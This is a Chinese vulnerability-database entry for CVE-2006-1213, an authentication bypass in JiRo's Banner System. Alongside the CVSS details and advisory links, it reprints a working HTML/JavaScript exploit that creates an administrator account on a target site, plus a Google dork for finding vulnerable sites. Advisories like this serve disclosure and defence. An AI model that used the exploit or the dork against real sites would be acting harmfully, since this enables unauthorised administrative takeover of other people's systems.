CVE-2006-1213
CVSS7.5
发布时间 :2006-03-13 20:06:00
修订时间 :2011-03-07 21:32:25
NMCOE    

[原文]JiRo's Banner System Experience and Professional 1.0 and earlier allows remote attackers to bypass access restrictions and gain privileges via a direct request to certain scripts in the files directory, as demonstrated by using addadmin.asp to create a new administrator account.


[CNNVD]JiRo's Banner ‘Addadmin.ASP’授权绕过漏洞(CNNVD-200603-229)

        JiRo's Banner系统经验和专业版1.0及其早期版本可以让远程攻击者通过对在文件目录中的某些脚本的一条直接请求,绕过访问限制并取得特权,如使用addadmin.asp去创建一个新的管理员账户所示那样。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:jiro:banner_system:1.0_professional
cpe:/a:jiro:banner_system:1.0_experience

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1213
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1213
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200603-229
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2006/0911
(UNKNOWN)  VUPEN  ADV-2006-0911
http://www.securityfocus.com/archive/1/archive/1/427326/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060309 Advisory: Jiros Banner Experience Pro Remote Privilege Escalation.
http://www.nukedx.com/?viewdoc=19
(VENDOR_ADVISORY)  MISC  http://www.nukedx.com/?viewdoc=19
http://secunia.com/advisories/19184
(VENDOR_ADVISORY)  SECUNIA  19184
http://xforce.iss.net/xforce/xfdb/25169
(UNKNOWN)  XF  jbspro-security-bypass(25169)
http://www.securityfocus.com/bid/17060
(UNKNOWN)  BID  17060
http://www.osvdb.org/23780
(UNKNOWN)  OSVDB  23780
http://archives.neohapsis.com/archives/fulldisclosure/2006-03/0211.html
(UNKNOWN)  FULLDISC  20060309 Advisory: Jiros Banner Experience Pro Remote Privilege Escalation.

- 漏洞信息

JiRo's Banner ‘Addadmin.ASP’授权绕过漏洞
高危 访问验证错误
2006-03-13 00:00:00 2006-03-14 00:00:00
远程  
        JiRo's Banner系统经验和专业版1.0及其早期版本可以让远程攻击者通过对在文件目录中的某些脚本的一条直接请求,绕过访问限制并取得特权,如使用addadmin.asp去创建一个新的管理员账户所示那样。

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本。

- 漏洞信息 (1571)

JiRos Banner Experience 1.0 (Create Admin Bypass) Remote Exploit (EDBID:1571)
asp webapps
2006-03-09 Verified
0 nukedx
N/A [点击下载]
<html>
<title>Jiros Banner Experience Pro Unauthorized Admin Add Exploit</title>
<body bgcolor="#000000">
<style>
.xpl {font-family:tahoma; font-size:11px; text-decoration: none;}
</style>
<script language="JavaScript">
function jbxpl() {
  if (document.xplt.victim.value=="") {
    alert("Please enter site!");
    return false;
  }
  if (confirm("Are you sure?")) {
    xplt.action="http://"+document.xplt.victim.value+"files/update.asp?Action=AddAdmin";
    xplt.aName.value=document.xplt.aName.value;
    xplt.aEmail.value=document.xplt.aEmail.value;
    xplt.aPassword.value=document.xplt.aPassword.value;
    xplt.aIsSystemAdmin=document.xplt.aIsSystemAdmin.value;
    xplt.aIsActive=document.xplt.aIsActive.value;
    xplt.submit();
  }
}
</script>
<strong>
<font class="xpl" color="#00FF40">
<pre>
<center>
Welcome to Jiros Banner Experience Pro Unauthorized Admin Add Exploit
This exploit has been coded by nukedx
You can found original advisory on http://www.nukedx.com/?viewdoc=19
Dork for this exploit: <u>inurl:JBSPro</u>
Your target must be like that: www.victim.com/Path/
The sites you found with given dork has like: www.victim.com/JBSPro/files or www.victim.com/JBSPro.asp
If the site has /JBSPro/files in link your target must be www.victim.com/JBSPro/
For second example your target must be www.victim.com/
You can login with your admin account via www.victim.com/JBSPath/files/login.asp
Have phun
<form name="xplt" method="POST" onsubmit="jbxpl();">
Target -> <input type="text" name="victim" value="www.victim.com/Path/" size="44" class="xpl">
<input type="text" name="aName" value="Enter Username" class="xpl" size="30">
<input type="text" name="aEmail" value="Enter Email" class="xpl" size="30">
<input type="text" name="aPassword" value="Enter Password" class="xpl" size="30">
<input type="hidden" name="aIsSystemAdmin" value="True">
<input type="hidden" name="aIsActive" value="True">
<input type="submit" value="Send" class="xpl">
</form>
</pre>
</font>
</strong>
</body>
</html>

Save this code as .htm and then execute.

# nukedx.com [2006-03-07]

# milw0rm.com [2006-03-09]
		

- 漏洞信息

23780
JiRos Banner System Professional addadmin.asp Unauthenticated Privileged Account Creation
Remote / Network Access Authentication Management
Loss of Integrity
Exploit Public

- 漏洞描述

JiRos Banner System Professional contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is caused by a failure in the application to properly perform authentication before granting administrator access. By making a direct request to the addadmin.asp script, an unauthenticated user may create a new account and set any privileges (including administrative).

- 时间线

2006-03-09 2006-03-07
2006-03-09 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站